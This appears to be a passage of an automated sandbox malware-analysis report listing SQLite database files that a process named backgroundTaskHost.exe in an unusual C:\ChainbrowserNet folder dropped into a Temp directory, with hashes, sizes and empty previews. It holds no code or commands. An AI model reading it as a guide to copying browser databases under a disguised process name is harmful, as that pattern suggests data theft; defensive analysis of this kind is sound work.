                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\6p7wQplNs6

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\7eQsUNTkjJ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\898Hm1Hf2T

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\8HDj4VI71t

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\8X7XAczR66

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\8oC6X0xudH

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\90cvSopJXR

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\9jbgvsKKEL

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\9vIgP8nsxz

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\A1tfPW00P1

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\A4MeAEFZPa

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\AQoz3jH42I

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\AjhQ1XfNH7

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\B1HQ2zyBDq

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\B3b9DIsJMO

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\B6tMDFra0L

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\BmMFhncVO3

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\BuO2O5M6YU

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\CFAz4dOZzK

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\CFejt312ic

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\CIGSWvsS39

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\COD8EKscuJ

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\CVUkCPqmCs

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

